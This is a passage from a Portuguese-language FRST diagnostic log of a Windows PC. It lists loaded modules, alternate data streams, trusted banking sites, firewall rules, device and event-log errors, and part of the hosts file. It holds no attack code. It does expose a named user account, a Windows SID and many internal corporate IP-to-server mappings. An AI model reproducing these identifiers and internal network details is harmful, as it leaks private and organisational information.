13:59 - 00631072 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\ProductStatistics.dll 2016-06-15 15:25 - 2009-02-27 17:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll 2017-02-07 12:30 - 2016-06-21 19:30 - 00442144 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl 2017-02-07 12:30 - 2016-06-21 19:29 - 00210720 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl 2017-02-07 12:30 - 2016-06-21 19:29 - 00059680 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl 2017-02-07 12:30 - 2016-05-23 21:49 - 00899872 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\webres.dll 2017-02-07 12:30 - 2016-10-18 16:57 - 00631072 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\ProductStatistics.dll 2014-12-17 21:53 - 2014-12-17 21:53 - 00065792 _____ () C:\Home\Programas\TortoiseSVN\bin\TortoiseStub32.dll 2014-12-17 21:53 - 2014-12-17 21:53 - 00071936 _____ () C:\Home\Programas\TortoiseSVN\bin\libsasl32.dll 2017-02-07 11:24 - 2016-12-20 16:36 - 01362720 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare\Scan.dll 2016-05-17 20:42 - 2016-05-17 20:42 - 00021680 _____ () C:\Home\Programas\Notepad++\plugins\NppExport.dll 2009-12-21 21:09 - 2009-12-21 21:09 - 00016832 _____ () C:\Program Files (x86)\Adobe\Reader 9.0\Reader\viewerps.dll 2017-02-13 12:08 - 2016-03-31 17:57 - 00899872 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\webres.dll 2017-02-13 12:08 - 2016-03-31 17:57 - 00188704 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\unrar.dll 2017-02-13 12:08 - 2016-03-31 17:57 - 00151840 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\zlibwapi.dll 2017-02-13 12:08 - 2016-03-31 17:57 - 00625440 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\ProductStatistics.dll 2017-01-30 16:13 - 2017-01-30 16:13 - 00054392 _____ () C:\Program Files (x86)\Trusteer\Rapport\bin\RapportTanzanUtil_2015.dll ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10] AlternateDataStreams: C:\Program Files (x86)\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg== [32] AlternateDataStreams: C:\Windows\System32:D5EF350D_Bb.gbp [2] AlternateDataStreams: C:\Windows\System32:D5EF350D_Cef.gbp [2] AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [2770] AlternateDataStreams: C:\Windows\system32\Drivers\gbpddreg64.sys:X5ZN8aGvT4 [686] AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2410] AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10] AlternateDataStreams: C:\Users\Public\DRM:احتضان [48] AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10] ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service" ==================== Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) IE trusted site: HKU\S-1-5-21-1570781029-660524082-555581952-15129\...\bancobrasil.com.br -> hxxps://www14.bancobrasil.com.br IE trusted site: HKU\S-1-5-21-1570781029-660524082-555581952-15129\...\bb.com.br -> hxxps://seg.bb.com.br IE trusted site: HKU\S-1-5-21-1570781029-660524082-555581952-15129\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br IE trusted site: HKU\S-1-5-21-1570781029-660524082-555581952-15129\...\sharepoint.com -> hxxps://sysmapsolutions-files.sharepoint.com IE trusted site: HKU\S-1-5-21-1570781029-660524082-555581952-15129\...\vivo.com.br -> hxxp://qualitycenterprd.vivo.com.br ==================== Hosts Conteúdo: ========================== (Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.) 2009-07-14 00:34 - 2017-02-06 17:31 - 00013727 ____N C:\Windows\system32\Drivers\etc\hosts 10.129.163.11 vivo360-hml.vivo.com.br10.128.6.153 ponterasa #Console SOA_WLS_INTRA 10.128.6.154 raposotavares #Console SOA_WLS_INTRA 10.128.185.166 guaiuvira #Consoles OSB_LEGACY, SOA_OSB11, SUITE_BATCH, SUITE_ONLINE 10.128.185.167 guarauba #Consoles OSB_LEGACY, SOA_OSB11, SUITE_BATCH, SUITE_ONLINE 10.128.6.152 pirituba #Console SOA_ALSDS 10.128.6.151 santoamaro #Console SOA_ALSDS 10.128.6.158 corticeira #Console SOA_WLI, WLI_MECSOL 10.128.6.157 riopequeno #Console SOA_WLI, WLI_MECSOL 10.129.178.16 brtlvlty0154sl #Console SOA_OMS 10.129.178.29 brtlvlty0155sl #Console SOA_OMS 10.129.180.178 brtlvlty0280sl #Console VIVO360 QA1 10.129.180.179 brtlvlty0281sl #Console VIVO360 QA110.129.165.27 alsb3-soa # [VIVO/HML_QA2]10.129.181.168 vivo360-hml2.vivo.com.br10.129.181.179 brtlvlty0397sl #Console OSB_Corporativo 10.129.181.180 brtlvlty0398sl #Console OSB_Corporativo 10.129.181.181 brtlvlty0399sl #Console OSB_Corporativo 10.129.181.182 brtlvlty0400sl #Console OSB_EAI1, SOA_EAI1 10.129.181.183 brtlvlty0401sl #Console OSB_EAI1, SOA_EAI1 10.129.181.178 brtlvlty0396sl #Consoles OSB_VIVO360_1, SUITE_BATCH 10.129.181.192 brtlvlty0410sl #Consoles OSB_VIVO360_1, SUITE_BATCH 10.129.181.193 brtlvlty0411sl #Consoles OSB_VIVO360_1, SUITE_BATCH 10.129.227.136 brtlvlty0510sl #Console SOA_ALDS 10.129.227.132 brtlvlty0511sl #Console SOA_ALDS 10.129.181.184 brtlvlty0402sl #Console SOA_OMS 10.129.181.185 brtlvlty0403sl #Console SOA_OMS 10.129.181.173 brtlvlty0391sl #Consoles SOA_OSB11, SUITE_ONLINE 10.129.181.174 brtlvlty0392sl #Consoles SOA_OSB11, SUITE_ONLINE 10.129.181.175 brtlvlty0393sl #Consoles SOA_OSB11, SUITE_ONLINE 10.129.227.133 brtlvlty0512sl #Console SOA_WLI, WLI_MECSOL 10.129.227.134 brtlvlty0513sl #Console SOA_WLI, WLI_MECSOL 10.129.181.169 brtlvlty0418sl #Console VIVO360 QA2 10.129.181.170 brtlvlty0419sl #Console VIVO360 QA211.111.111.111 vivo360-hml3.vivo.com.br10.129.228.10 vivo360-pre.vivo.com.br10.129.167.114 aidamina #Console OSB_LEGACY Existem ainda 166 mais linhas. ==================== Outras Áreas ============================ (Atualmente não há nenhuma correção automática para esta seção.) HKU\S-1-5-21-1570781029-660524082-555581952-15129\Control Panel\Desktop\\Wallpaper -> C:\Users\gustavo.ukita.SYSMAP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 10.100.12.65 - 10.100.14.21 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) mpsdrv => O Serviço Firewall não está sendo executado. MpsSvc => O Serviço Firewall não está sendo executado. ==================== MSCONFIG/TASK MANAGER ítens desabilitados == MSCONFIG\Services: AdvancedSystemCareService10 => 2 MSCONFIG\Services: IObitUnSvr => 2 MSCONFIG\Services: ss_conn_service => 3 MSCONFIG\Services: TeamViewer => 2 MSCONFIG\startupfolder: C:^Users^gustavo.ukita^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Enviar para o OneNote.lnk => C:\Windows\pss\Enviar para o OneNote.lnk.Startup MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" MSCONFIG\startupreg: Akamai NetSession Interface => MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR MSCONFIG\startupreg: KiesPDLR.exe => C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\KiesPDLR.exe Run MSCONFIG\startupreg: KiesTrayAgent => MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" ==================== Regras do Firewall (Whitelisted) =============== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [{3BF0D118-0155-4AF7-91B0-4C4FA6ED286F}] => LPort=54925 FirewallRules: [{4C5ADFFF-34E1-4967-845C-11F0DCA33BFC}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{10853599-D141-4E7D-9569-1C99B3DC6222}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{DE6B6C17-7893-40D4-8061-893160FBBB15}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{C0AE0B9C-C43A-4915-928F-5D5B808B6163}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{5FC6FEDB-156A-441A-A06D-FDDF3B715E44}] => C:\Program Files\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{A6676692-5A9A-4628-93D9-D369F4DE9A55}] => C:\Program Files\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{E336C1C7-0EC3-4347-96DF-5A83649034C5}] => C:\Program Files\Microsoft Office\root\Office16\Lync.exe FirewallRules: [{22C35ACD-F319-439F-AE84-EC1E8AEDE300}] => C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{DA94AF3E-333E-47C5-914C-314335DDCC05}] => C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe FirewallRules: [{ED8A2A30-2252-4E21-8864-0B8C4B6F3D25}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{EE866EC1-B9B9-4C38-A5B6-2CF041950032}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{2AD51992-99E4-4DF7-8907-63AFC42AA2FD}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{31C326DD-2679-4585-B3F1-35B702589B9C}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{CCBDF8B6-4B12-47FF-941A-FB2C5B1068E3}] => LPort=15000 FirewallRules: [{E598002D-3F99-4AA8-BEED-92DFBB434B00}] => LPort=15000 FirewallRules: [{6A898DA1-B6CA-46B3-A919-FF8102CD4098}] => LPort=15000 FirewallRules: [{4C97F89B-1E24-43B2-A43D-49ACCF678EA2}] => C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagwds.exe FirewallRules: [{6F055DA3-3BB6-4983-AFDC-720788EB37CD}] => C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagwds.exe FirewallRules: [{1819735C-09BD-465A-A221-D2F15E13D8F9}] => C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagwds.exe FirewallRules: [{2AD83926-E3BB-45DF-8CC4-115CDFB46C73}] => C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagwds.exe FirewallRules: [{A718BE78-7D34-441C-A02E-0A9DA79A3995}] => C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagwds.exe FirewallRules: [{17717DD1-4858-4A50-B11B-6B170E011706}] => C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\klnagwds.exe FirewallRules: [{3394FE86-2185-4C8D-9895-2B533D5662C1}] => C:\Home\Programas\VisualStudio\Common7\IDE\devenv.exe FirewallRules: [{D236F975-EC78-45C4-AB7B-CF012EF4928F}] => C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{0AA8115F-C3D3-4F66-8065-2A4E812ED8F7}] => C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{0015875B-F699-487D-8295-8005B99F03F1}] => C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{621F86E4-DA0D-456E-BCF4-96D8FD179399}] => C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{01CEFFA7-1751-4B49-B5C9-E005E2581AF6}] => C:\Program Files\Diebold\Warsaw\core.exe FirewallRules: [TCP Query User{5CA823D9-6A5B-418A-8F78-20064E75DE3F}C:\program files\microsoft office\root\office16\lync.exe] => C:\program files\microsoft office\root\office16\lync.exe FirewallRules: [UDP Query User{79CEA025-9EDD-4BB2-B9A4-7F6E4944B1A3}C:\program files\microsoft office\root\office16\lync.exe] => C:\program files\microsoft office\root\office16\lync.exe FirewallRules: [TCP Query User{D061694E-C195-47A9-92D9-C87B7717C6FC}C:\home\programas\mobaxterm personal edition\mobaxterm.exe] => C:\home\programas\mobaxterm personal edition\mobaxterm.exe FirewallRules: [UDP Query User{EB702A65-AE6E-4672-9AE7-1D5C0BAA9DF6}C:\home\programas\mobaxterm personal edition\mobaxterm.exe] => C:\home\programas\mobaxterm personal edition\mobaxterm.exe FirewallRules: [{EC3A0C42-750C-4EFE-826A-FBE3FE83D1E4}] => C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{5B9EECEA-4032-4F67-87EF-22896CDCB997}] => C:\Program Files\Microsoft Office\Office15\lync.exe FirewallRules: [{7DC1D127-928A-41F3-8873-05D0C2152EA9}] => C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{46BE22D9-8DAC-466F-AF63-BB4DD2648E0C}] => C:\Program Files\Microsoft Office\Office15\UcMapi.exe FirewallRules: [TCP Query User{A8B48375-7164-4224-B6DD-CC16A5A60443}C:\home\programas\soapui-5.2.1\bin\soapui-5.2.1.exe] => C:\home\programas\soapui-5.2.1\bin\soapui-5.2.1.exe FirewallRules: [UDP Query User{B07C7941-5A89-4BB0-BBB0-5108F3A9950F}C:\home\programas\soapui-5.2.1\bin\soapui-5.2.1.exe] => C:\home\programas\soapui-5.2.1\bin\soapui-5.2.1.exe FirewallRules: [TCP Query User{38C04625-558D-45A1-9D4B-80CEA2044A50}C:\program files\microsoft office\office15\lync.exe] => C:\program files\microsoft office\office15\lync.exe FirewallRules: [UDP Query User{86807920-14DD-49F0-8AD0-2239BCD8258F}C:\program files\microsoft office\office15\lync.exe] => C:\program files\microsoft office\office15\lync.exe FirewallRules: [{21D1CD0E-69E3-4F65-8D4A-52E28DD723E6}] => C:\Home\Programas\PuTTY\putty.exe FirewallRules: [{5F4B80A5-62C0-4644-AEF9-5E63B09DAE5A}] => C:\Home\Programas\PuTTY\putty.exe FirewallRules: [{9C264E8C-19AE-452C-9ECF-A95C5E6F77BE}] => C:\Program Files\Java\jre1.8.0_66\bin\java.exe FirewallRules: [{45631AA7-0C4D-43BF-A2E8-01BCAFDE0B3C}] => C:\Program Files\Java\jre1.8.0_66\bin\java.exe FirewallRules: [{9518FF6E-BB7D-492B-B940-17A463DF2DDE}] => C:\Program Files\Java\jdk1.8.0_66\bin\javac.exe FirewallRules: [{0DBD7942-6E9B-42F7-AACA-768BA99FD7A1}] => C:\Program Files\Java\jdk1.8.0_66\bin\javac.exe FirewallRules: [{3E9D9509-AE95-4470-ADD8-4DDC1F98C86E}] => C:\Program Files\Java\jdk1.8.0_66\bin\java.exe FirewallRules: [{56400A52-54FA-4ACC-B23C-86A287DB0022}] => C:\Program Files\Java\jdk1.8.0_66\bin\java.exe FirewallRules: [{8073D3EF-3501-45E9-B932-95E32AD65773}] => C:\Program Files\Java\jdk1.7.0_79\jre\bin\java.exe FirewallRules: [{7CAA1126-0C36-4692-814B-FB0F7DD32DDB}] => C:\Program Files\Java\jdk1.7.0_79\jre\bin\java.exe FirewallRules: [{5D9F16AE-8F90-434E-B045-45F4CA432C32}] => C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe FirewallRules: [{360260F5-FBCD-47A0-8301-CE58F77597EE}] => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\DriverBooster.exe FirewallRules: [{2E619A9B-9220-47FD-8947-E936DE345467}] => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\DriverBooster.exe FirewallRules: [{3766C9CC-5ED7-40A2-894C-EF491B429C03}] => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\DBDownloader.exe FirewallRules: [{C8678AB0-4998-4E8A-AE07-FF68E5EF7B72}] => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\DBDownloader.exe FirewallRules: [{25E7C6D3-7727-4727-9BF6-62671FC546B2}] => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\AutoUpdate.exe FirewallRules: [{1325A9E8-98E6-4875-82BA-5D9CC47338D7}] => C:\Program Files (x86)\IObit\Driver Booster\4.2.0\AutoUpdate.exe FirewallRules: [{5DBAA199-3A7D-43D1-876E-EA2A3FD96D2C}] => C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe FirewallRules: [{CF58EB62-5B4A-4B34-96E0-D5060F0F871D}] => C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe FirewallRules: [{20CC2B22-7D64-4EC6-97AB-1053BF1957E8}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3A3154CC-4144-407F-BC2F-0EB7BF04CE28}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Pontos de Restauração ========================= 09-02-2017 15:45:59 Instalador de Módulos do Windows 09-02-2017 16:53:52 Removed Samsung Kies 09-02-2017 16:54:00 Removed Samsung Kies 09-02-2017 16:58:48 Instalador de Módulos do Windows 10-02-2017 14:33:28 Removed Adblock Plus para o IE (32 e 64 bits) 10-02-2017 14:36:17 Removed SlimDrivers 10-02-2017 15:13:37 Removed Skype™ 7.31 Cheque o serviço "winmgmt" ou repare o WMI. ==================== Dispositivos Apresentando Falhas No Gerenciador ============= Name: Cisco Systems VPN Adapter for 64-bit Windows Description: Cisco Systems VPN Adapter for 64-bit Windows Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Cisco Systems Service: CVirtA Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Controlador USB (Universal Serial Bus) Description: Controlador USB (Universal Serial Bus) Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Standard VGA Graphics Adapter Description: Standard VGA Graphics Adapter Class Guid: {4d36e968-e325-11ce-bfc1-08002be10318} Manufacturer: (Tipos padrão de vídeo) Service: vga Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Erros no Log de eventos: ========================= Erros em Aplicativos: ================== Error: (02/13/2017 04:50:20 AM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/12/2017 09:03:09 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (02/12/2017 08:39:33 PM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/12/2017 04:36:19 PM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/12/2017 11:18:18 AM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/12/2017 05:39:45 AM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/11/2017 09:03:09 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (02/11/2017 07:30:53 PM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/11/2017 06:18:46 AM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Error: (02/11/2017 03:52:18 AM) (Source: OCS INVENTORY SERVICE) (EventID: 20) (User: ) Description: ERROR: OCS Inventory NG Agent encounter an error, exit code is 4. Erros de Sistema: ============= Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4108) (User: SYSMAP) Description: O certificado recebido do servidor remoto não foi validado corretamente. O código de erro é 0x80092012. Falha na solicitação de conexão SSL. Os dados anexados contêm o certificado do servidor. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4120) (User: SYSMAP) Description: O seguinte alerta fatal foi gerado: 43. O estado do erro interno é 552. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4108) (User: SYSMAP) Description: O certificado recebido do servidor remoto não foi validado corretamente. O código de erro é 0x80092012. Falha na solicitação de conexão SSL. Os dados anexados contêm o certificado do servidor. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4120) (User: SYSMAP) Description: O seguinte alerta fatal foi gerado: 43. O estado do erro interno é 552. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4108) (User: SYSMAP) Description: O certificado recebido do servidor remoto não foi validado corretamente. O código de erro é 0x80092012. Falha na solicitação de conexão SSL. Os dados anexados contêm o certificado do servidor. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4120) (User: SYSMAP) Description: O seguinte alerta fatal foi gerado: 43. O estado do erro interno é 552. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4108) (User: SYSMAP) Description: O certificado recebido do servidor remoto não foi validado corretamente. O código de erro é 0x80092012. Falha na solicitação de conexão SSL. Os dados anexados contêm o certificado do servidor. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4120) (User: SYSMAP) Description: O seguinte alerta fatal foi gerado: 43. O estado do erro interno é 552. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4108) (User: SYSMAP) Description: O certificado recebido do servidor remoto não foi validado corretamente. O código de erro é 0x80092012. Falha na solicitação de conexão SSL. Os dados anexados contêm o certificado do servidor. Error: (02/13/2017 12:21:07 PM) (Source: Schannel) (EventID: 4120) (User: SYSMAP) Description: O seguinte alerta fatal foi gerado: 43. O estado do erro interno é 552. CodeIntegrity: =================================== Date: 2016-10-13 11:57:54.408 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Enigma Software Group\SpyHunter\esgiguard.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-13 11:57:54.381 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Enigma Software Group\SpyHunter\esgiguard.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Informações da Memória =========================== Processador: Intel(R) Core(TM) i7-3632QM CPU @ 2.20GHz Percentagem de memória em uso: 52% RAM física total: 8067.31 MB RAM física disponível: 3867.3 MB Virtual Total: 16132.8 MB Virtual disponível: 11106.14 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:698.54 GB) (Free:545.49 GB) NTFS ==================== MBR & Tabela de Partições ================== ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 29.8 GB) (Disk ID: 4F98D6F9) ==================== Fim de Addition.txt ============================